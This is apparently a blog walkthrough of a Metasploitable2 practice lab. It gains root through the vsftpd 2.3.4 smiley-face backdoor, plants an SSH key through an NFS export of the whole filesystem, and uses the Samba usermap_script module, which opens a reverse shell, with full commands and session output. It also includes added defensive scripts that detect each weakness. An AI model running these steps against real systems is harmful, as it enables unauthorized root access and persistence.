Metasploitable2 practice series: exploiting the vsftpd backdoor and the Linux NFS share misconfiguration

Continuing from the previous post, this time we work through the vsftpd backdoor, the Linux NFS shared-directory misconfiguration, and the Samba 3.x exploit.

vsftpd backdoor

nmap scan

Port 21 is found running the vsftpd service, version 2.3.4.

This particular version contains a backdoor that an unknown intruder introduced into the core code. The backdoor was identified and removed quickly, but before it was removed the tainted release had already been downloaded by a number of people. If the username sent to the server is followed by ":)" (a smiley face), this version's backdoor opens a listening shell on port 6200.

We can confirm this by hand with telnet, or attack it automatically with the corresponding Metasploit exploit module.

Manual exploitation with telnet

Try connecting:

telnet 192.168.52.144 21
Trying 192.168.52.144...
Connected to 192.168.52.144.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user attack:)
331 Please specify the password.

Open another window, try connecting to port 6200 with telnet, and use python -c 'import pty;pty.spawn("/bin/bash")' to get a pseudo-terminal:

telnet 192.168.52.144 6200
Trying 192.168.52.144...
Connected to 192.168.52.144.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
: command not found
python -c 'import pty;pty.spawn("/bin/bash")';
root@metasploitable:/# ls
ls
bin dev initrd lost+found nohup.out root sys var
boot etc initrd.img media opt sbin tmp vmlinuz
cdrom home lib mnt proc srv usr

Automatic exploitation with MSF

msf5 > search vsftpd

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution


msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Automatic


msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.52.144
rhost => 192.168.52.144

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.52.144:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.52.144:21 - USER: 331 Please specify the password.
[+] 192.168.52.144:21 - Backdoor service has been spawned, handling...
[+] 192.168.52.144:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.52.134:40789 -> 192.168.52.144:6200) at 2020-05-05 16:14:46 +0800

python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/#
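The telnet session and the MSF output above both show what the backdoor looks like on the wire: a 2.3.4 banner, then a USER command whose name carries ":)". The following script is an added example (not code from the original post) that audits a captured FTP control-channel transcript from the defender's side and flags those two indicators. It treats ":)" anywhere in the username as a hit, since that is the trigger the post describes; the sample transcript is constructed to mirror the session shown above.

```python
"""Defender-side check for the vsftpd 2.3.4 backdoor pattern.

Added example, not part of the original post. It reads a captured FTP
control-channel transcript (one line per command/reply) and reports a
2.3.4 banner and any USER command whose name contains ":)". The sample
session below is constructed from the post's own telnet exchange.
"""
import re

BANNER_RE = re.compile(r"^220\s+\(vsFTPd\s+([\d.]+)\)")
USER_RE = re.compile(r"^USER\s+(.+?)\s*$", re.IGNORECASE)
VULNERABLE_VERSION = "2.3.4"
TRIGGER = ":)"


def audit_ftp_transcript(lines):
    """Return a list of (line_no, finding) tuples for suspicious lines."""
    findings = []
    for n, raw in enumerate(lines, 1):
        line = raw.rstrip("\r\n")
        m = BANNER_RE.match(line)
        if m:
            if m.group(1) == VULNERABLE_VERSION:
                findings.append((n, f"banner advertises vsFTPd {m.group(1)} (backdoored build)"))
            continue
        m = USER_RE.match(line)
        if m and TRIGGER in m.group(1):
            findings.append((n, f"USER {m.group(1)!r} contains the {TRIGGER} backdoor trigger"))
    return findings


# Constructed sample, mirroring the session in the post plus one normal login.
SAMPLE_SESSION = [
    "220 (vsFTPd 2.3.4)",
    "user attack:)",
    "331 Please specify the password.",
    "USER msfadmin",
    "331 Please specify the password.",
]

# Constructed clean session from a patched server: nothing should be flagged.
CLEAN_SESSION = [
    "220 (vsFTPd 3.0.3)",
    "USER msfadmin",
    "331 Please specify the password.",
]

if __name__ == "__main__":
    for line_no, finding in audit_ftp_transcript(SAMPLE_SESSION):
        print(f"line {line_no}: {finding}")
```

The banner check is only a hint (a banner can be edited), so the username check is the one that actually identifies an attempt to trigger the backdoor; the durable fix is replacing the tainted 2.3.4 build, and any unexpected listener on port 6200 on an FTP host is worth investigating.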

Linux NFS shared-directory misconfiguration

Check whether NFS is exposed

rpcinfo -p [target ip]

xin@kali:~$ rpcinfo -p 192.168.52.144
program vers proto port service
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 38822 status
100024 1 tcp 50018 status
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100021 1 udp 47531 nlockmgr
100021 3 udp 47531 nlockmgr
100021 4 udp 47531 nlockmgr
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100021 1 tcp 52585 nlockmgr
100021 3 tcp 52585 nlockmgr
100021 4 tcp 52585 nlockmgr
100005 1 udp 36165 mountd
100005 1 tcp 39215 mountd
100005 2 udp 36165 mountd
100005 2 tcp 39215 mountd
100005 3 udp 36165 mountd
100005 3 tcp 39215 mountd

List the directories the target exports

showmount -e [target ip]

xin@kali:~$ showmount -e 192.168.52.144
Export list for 192.168.52.144:
/ *

The root directory, and therefore everything under it, is exported.

Generate an RSA public key

ssh-keygen

xin@kali:~$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/xin/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/xin/.ssh/id_rsa.
Your public key has been saved in /home/xin/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:1E7/aDLdsjBakGT1TaaGUsA1MEnTYZWqajDBoaPPjCs xin@kali
The key's randomart image is:
+---[RSA 3072]----+
| o**Bo..o |
| . oB.+.= |
| o . = +.+ . |
| o o + =.o |
| . . . S.. . |
|. o .. . + |
| = o . * = o |
|E + o o * o |
|o. . . . |
+----[SHA256]-----+

Mount

xin@kali:~$ mkdir /tmp/msftables
xin@kali:~$ mount -o nolock -t nfs 192.168.52.144:/ /tmp/msftables
mount: only root can use "--options" option
xin@kali:~$ sudo mount -o nolock -t nfs 192.168.52.144:/ /tmp/msftables
[sudo] xin 的密码:
xin@kali:~$ cat /home/xin/.ssh/id_rsa.pub >> /tmp/msftables/root/.ssh/authorized_keys
bash: /tmp/msftables/root/.ssh/authorized_keys: 权限不够

xin@kali:~$ sudo cat /home/xin/.ssh/id_rsa.pub >> /tmp/msftables/home/msfadmin/.ssh/authorized_keys
xin@kali:~$ ssh msfadmin@192.168.52.144
The authenticity of host '192.168.52.144 (192.168.52.144)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.52.144' (RSA) to the list of known hosts.
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Tue May 5 04:14:33 2020
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$

When I tried putting the public key under root's directory it reported insufficient permissions, so I had no choice but to put it in the user's home directory and work with msfadmin privileges; after that the privilege-escalation routine from before can be used.
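The whole NFS chain above hinges on one line of `showmount -e` output: `/ *`, the filesystem root exported to every host. The script below is an added example (not code from the original post) that audits exports from the defender's side: it parses `showmount -e` output and `/etc/exports` syntax and flags exports open to every host, exports of `/`, and the `no_root_squash` option. The showmount sample is constructed from the post's output; the weak and hardened `/etc/exports` lines are constructed too, and the hardened one assumes a share directory `/srv/share` and the lab's `192.168.52.0/24` network.

```python
"""Audit NFS exports for the misconfiguration shown in the post.

Added example, not part of the original post. Parses `showmount -e`
output and /etc/exports lines and reports the risky patterns. All sample
inputs are constructed.
"""
import re

SPEC_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_showmount(text):
    """Return [(path, client, set())] from `showmount -e` output."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("Export list"):
            continue
        parts = line.split(None, 1)
        path = parts[0]
        clients = parts[1].split(",") if len(parts) > 1 else ["*"]
        for client in clients:
            entries.append((path, client.strip(), set()))  # showmount shows no options
    return entries


def parse_exports_file(text):
    """Return [(path, client, {option, ...})] from /etc/exports syntax.

    Handles the common `path client(opts) client2(opts)` form. A spec with
    an empty host field, e.g. `(rw)`, applies to every client per exports(5);
    a bare path with no client field is treated the same way (assumption).
    """
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:] or ["*"]
        for spec in specs:
            m = SPEC_RE.match(spec)
            client = m.group(1) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            entries.append((path, client, opts))
    return entries


def audit(entries):
    """Return human-readable findings for (path, client, opts) entries."""
    findings = []
    for path, client, opts in entries:
        if client == "*":
            findings.append(f"{path}: exported to every host (*)")
        if path == "/":
            findings.append(f"{path}: whole filesystem root is exported")
        if "no_root_squash" in opts:
            findings.append(f"{path}: no_root_squash lets a remote root write as uid 0")
    return findings


# Constructed from the post's showmount output.
SHOWMOUNT_SAMPLE = "Export list for 192.168.52.144:\n/ *\n"
# Constructed /etc/exports lines: the weak setting and a hardened alternative.
WEAK_EXPORTS = "/ *(rw,no_root_squash)\n"
HARDENED_EXPORTS = "/srv/share 192.168.52.0/24(ro,root_squash,no_subtree_check)\n"

if __name__ == "__main__":
    for label, text, parser in (("showmount", SHOWMOUNT_SAMPLE, parse_showmount),
                                ("weak", WEAK_EXPORTS, parse_exports_file),
                                ("hardened", HARDENED_EXPORTS, parse_exports_file)):
        print(label, audit(parser(text)) or "no findings")
```

Restricting the client list and exporting a dedicated subtree rather than `/` removes the write path to `authorized_keys` that the post uses; keeping `root_squash` (the default) is what stopped the write into `/root/.ssh` here, but it does nothing for a regular user's home, so the host restriction is the control that matters.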

samba smbd 3.x

msf5 exploit(linux/samba/is_known_pipename) > search samba

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
1 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow
2 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow
3 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
4 auxiliary/scanner/rsync/modules_list normal No List Rsync Modules
5 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
6 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
7 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
8 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
9 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
10 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
11 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
12 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
13 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
14 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
15 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
16 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
17 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
18 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
19 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
20 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
21 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
22 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
23 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
24 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
25 post/linux/gather/enum_configs normal No Linux Gather Configurations


msf5 exploit(linux/samba/is_known_pipename) > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set rhost 192.168.52.144
rhost => 192.168.52.144
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.52.144 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Automatic


msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 192.168.52.134:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7VUWl3ceAVJuDGMo;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "7VUWl3ceAVJuDGMo\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.52.134:4444 -> 192.168.52.144:60318) at 2020-05-05 17:10:26 +0800

id
uid=0(root) gid=0(root)
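The module used above is named after the Samba directive it abuses, "username map script", which makes the server run a configured script during user mapping. The following script is an added example (not code from the original post or from the Samba project) that reads an smb.conf and reports every place that directive is set, so an administrator can find and remove it on affected 3.x hosts. The sample configs are constructed, and the script path in the weak sample is a placeholder.

```python
"""Locate the "username map script" directive in an smb.conf.

Added example, not part of the original post. A small reader for Samba's
INI-style config: it tracks the current [section], skips comments, and
normalises keys the way Samba does (case and internal whitespace are
ignored). The sample configs are constructed.
"""


def find_username_map_script(conf_text):
    """Return [(section, value)] for every 'username map script' setting."""
    hits = []
    section = "global"
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # smb.conf comments start with # or ;
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        key = " ".join(key.lower().split())  # Samba ignores key case and extra spaces
        if key == "username map script":
            hits.append((section, value.strip()))
    return hits


# Constructed config with the risky directive (script path is a placeholder).
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = lab file server
   ; hook that runs an external script during user mapping
   Username Map Script = /etc/samba/scripts/PLACEHOLDER-map.sh

[tmp]
   path = /tmp
   writable = yes
"""

# Constructed hardened config: same shares, directive removed.
HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = lab file server

[tmp]
   path = /tmp
   writable = yes
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, find_username_map_script(conf) or "directive not set")
```

Removing the directive closes the code path the module relies on, and updating Samba removes the bug itself; on the network side, the MSF output above shows the tell-tale of this class of exploit, a reverse TCP connection from the file server back to port 4444 on the attacking host, which a file server has no business making.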



https://chujian521.github.io/blog/2020/05/05/Metasploitable2系列练习-漏洞利用之vsftpd后门与linuxNFS共享目录配置漏洞/
Author: Encounter
Published: May 5, 2020